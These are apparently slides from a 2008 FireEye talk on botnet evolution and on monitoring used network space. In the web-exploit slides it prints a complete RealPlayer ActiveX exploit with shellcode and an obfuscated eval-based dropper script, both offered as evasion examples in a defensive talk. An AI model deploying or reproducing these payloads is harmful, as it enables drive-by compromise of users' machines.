lit space monitoring for botnets stuart staniford chief scientist 1/21/2008
TRANSCRIPT
Lit Space Monitoring for Botnets
Stuart StanifordChief Scientist
1/21/2008
2
Botnets = Targeted Infection + Remote Control Payload
Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities
Remote control payload enables further malicious payload installs
Malicious payloads enable monetization via: Spam relay (leased to spammers) DDoS (extortion business model) ID Theft (consumer, business, or gov’t) Intellectual property theft
Phishing site hosting Click fraud Online financial services fraud E-commerce site fraud
33
Botnets Are A Critical Threat
Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007
Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches.
Up to a quarter of computers on the net may be used by cyber criminals in so-called botnets - Vint Cerf
Botnets: A Global Pandemic
4
Growing Wave of Concern
NuisanceLate 1990’s - 2002
Concern2003 - 2006
Low
Danger2007 - Beyond
Botnet Attack Evolution
High
Mag
nitu
de o
f T
hrea
t
Consumer
Service Provider
Enterprise
GovernmentCyber warfare
Mass-scale DDoSMass-scale SPAMClick fraudIdentity TheftPhishingPharming
Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance RisksProductivity LossBrand DamageResource Inefficiency
Cyber-terrorism
DDoS SPAMSpyware platformSteal resources
Traditional Botnet (first half 2000s)
Grow by active scanning
Command & Control via IRC
6
Still a lot of that about
Portion of a botnet tracked by FireEye botwall network
Monitoring Traditional Botnets
Dark IP Space/Network Telescope
Wait for bot to scan, andtry to capture
Tradeoffs of Dark IP Monitoring
Advantages Fidelity - if something scans dark IP, is likely bad Cheap/easy - can cover a lot of IP space that wasn’t being
used Especially internally to enterprises
Disadvantages Some bots avoid the dark-IP space - scan selectively Persuading the bot to talk can be tricky
Need deep interaction honeypot to do it right Bots moving away from scanning as a technique Bot-owners can learn Dark Ips if feedback (eg to signatures)
Directions in Botnet Technology
Technology evolution is rapid Well funded industry Smart technologists Disciplined execution of attacks and management of
resources/business Gives various trends that render current defensive
technologies obsolete1. Exploits via web/email (bypass firewall)2. Obfuscation and polymorphism (bypass AV/IPS)3. Distributed command-and-control, and high turnover of
assets, 1. renders trackdown and clean-up hard2. DNS tracking hard3. Web crawling behind the curve
Exploits via web
if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75%06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion=="6.0.14.544")ret=unescape("%63%11%08%60");else if(RealVersion=="6.0.14.550")ret=unescape("%63%11%04%60");else if(RealVersion=="6.0.14.552")ret=unescape("%79%31%01%60");else if(RealVersion=="6.0.14.543")ret=unescape("%79%31%09%60");else if(RealVersion=="6.0.14.536")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvkKNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NXKjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnXzmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSNzT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWinInPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZodKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZoWsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInOoDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vvYiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQelhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJQspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsqmk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLNktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();
More obfuscated example
<script language=JavaScript>function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23,3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb4Ta45pZ9ooUb2HfhDsXkcYfh3BCNgf8N@YJ45EXyi9ZPwkXown8bIs8BTy9k3hvo_k5o@9YV@GDMTzXo3SXBwn8MIGdk31CNISWN@kgV5pRMVId9xKa45pRmeKvy28iZcU5y2oa45acGeK0qIGdk31CN4SWN@Hwy2myMwcUkdQaP_cvP@u9mTlJpTaiZcu8o@kWB_HfhDsXkcCfh3BCNgjvo_S8NIWdP@n9mTGvowYXhIYXkcCibIvvEVf9hdsCVT8ix5kjPThJkIvdE3SCNwWaFIsWVxS6k3mg4TMdEIW5E@ljP_HwiwnXo@1XP_HYyDsUEwWXo@Cw25y0ZTvvo@HYyDsUEwkCVxL6oIQ9hcAxpTau2_S9BTEXi_Q9N@k5owmJkIvdE3SCNwWaFIsWVoQ9N@k5owyiZTvvo@Hwb2sUkInjEwW6kc1vo_k1kIn5o@1uBwSCV3l9hwyiZTkjPThwb2sUkInjEwW6oguXkIW8PdhyMokaEtWyF6HOFcHgFtkuMDaumTvvo@Hljd15JVmlb3n5aokaEidXo@udEw1DFeKjh3W8hdlak6yiZTHujIn8PdqdE@nWFcHZPwkXowndiwX5o@FvP_k5ow1OP@s6bd15o@dXo@udEw1e45HuM@OdP_fDPThljd15JVkiZTHxV5HumTfvE@QW2TOD9VO92UaumTHum0@5aV@9qisvP_fDk3z6ptyiZTHumT6XBwGjj3W8hdlakcfUkdQaP_Eao3l9hwSChdlaogSWB@Mdowl9VoQ9N@k5owyiZTHumT@vP_fDPxk8B_mbb_GUooQ9N@k5ow1ZB@GdP_hyMUCwMUaumTHu23l9BThbhIWWFdmuqUHwPTpumVSCNIhUbduCVgGXowYCBdyuFdbxF6HxBTkjPThujIn8PdqdE@nejd26GcCZ9VWyF6HxBTVWairW0txWhIn8PdQCkcAxpTmWFraumTHuFdXWm6VWairW0txWhIn8PdQCkcmOG6HxBTKDB@G5kdnab_F9k3W6GUyuFrHiZTHumTQUE@QWMDHYyDsUEwkCVxL6oIQ9hcPxpTmW25HumTHyo@QvEdyumTHu25HumTfvE@QW2TO9qeO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbe45HumTfvE@QW2TO9qeulVT9iZTHumTKDB@G5kdnab_F9k3W6GUyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TOayoO92UaumTHuF2BWBwldP_5XhwCXo@mwqUaumTHu2IWXkIbepTHumTHiZTHuMIS8h3HyM_PYq_Ci45HumTHYyDsUEwkCVxL6oIQ9hcAx45HumTHyo@QvEdyumTHumTaumTHZkIuXPTClhUBlVT9iZTHumTKDB@G5kdnab_F9k3W6GtyiZTHumTC9h3SeEUHumTHu25HumTfvE@QW2TO6b2O92UaumTHuF2BWBwldP_5XhwCXo@mOqUaumTHu2IWXkIbepTHumTHiZTHum3QjkILUP_9umTaumTHuF2BWBwldP_5XhwCXo@mwqUHu25HumTHyo@QvEdyumTHiZTHgV5HuM@OdP_fDPThYyDsUEwkCVxL6oIQ9h6aumTy0ZTHuMIS8h3HuFt9iZTHumTC9h3SeEUaumTHZkIuXPTHw4UaumTHumwl8kIndEw1amdWXo3myMgQDP@lYPdsvqiW1E3zaP_WuG7AJmdn6oTyiZTHumTC9h3SeEUHu25HumTzXo3SXBwn045HumTHyo@QvEdyumTHumTHu25HuFrauFragV5abk_18P_k5owHlb3n5aokaEidXo@udEw1DFeK50_Q9N@kiRDauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gAlF6HOFcHgFtku2@QCh_WaPTClB0@1VTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaP3l1N@HJyoHY4gWlF6HOFcHgFtku2@QCh_WaPTClVtJ8q_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWF71uqKkuFTmuFgAwmTWXP_L9VwHyM_WxJ_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uW2xIWm7YwmTSgpTFOG6Hyh3nXV@1W2TOayoO925Hwo3HrFeK50_Q9N@1wowzXPDRjP6Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2@QCh_WaPTClhUBlVTauFdXWm6EXJivXo@uaFd1Ck3B5i3hlMokaPTPrBTnJFUYwmTSgpTFOG6Hyh3nXV@1W2TO6b2O925m0x5pRM@f9hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25")</script>
Variables and encoding can be polymorphic - not much for signatures to go on
Preliminary Expt on open network (Dec)
~ 5000 users ~ 3 hrs of intermittent data Parsed HTTP and entities ~ 200,000 HTTP containing flows Google safe browsing API alerted on ~700 of them Manually verified - only 11 checked out Daily rate is ~100 incidents/day
Don’t know how many were successful at this point Not sure how typical this period is so only order of magnitude
estimate Google safe browsing API is 99%+ false positives
Reasons not well understood yet Gearing up for another experimental run
Hopefully LEET 08 paper
Distributed Command and Control - Storm
Grow by spam/malicious downloads - been running for 12 months now in plain sightNo scanning!
115,000 seen from a single .edu
eDonkey UDP messages in Peer-to-Peer command and control
Dynamic Infrastructure - Fast Flux
DNS Servers
Small Number of Persistent Content Servers
Large Number of DynamicProxies
FireEye, Inc. Confidential 15
Rendering Current Approaches Obsolete
GAPNeed security solution
that scales with exponential nature of threat
AntivirusBypass by not matching
AV signatures
IDS/IPSBypass by not matching signatures & using other
infection vectors
Network Behavior AnalysisBypass by low &
slow spread
Dark IP HoneypotsBypass by not targetingdark IP addresses and
honeypots
FireEye, Inc. Confidential 16
Lit Space Monitoring
FireEye, Inc. Confidential 17
Global Deployment
Local Analysis & Protection
Global Analysis & Intelligence Distribution
FireEye, Inc. Confidential
Thank you!
Q & A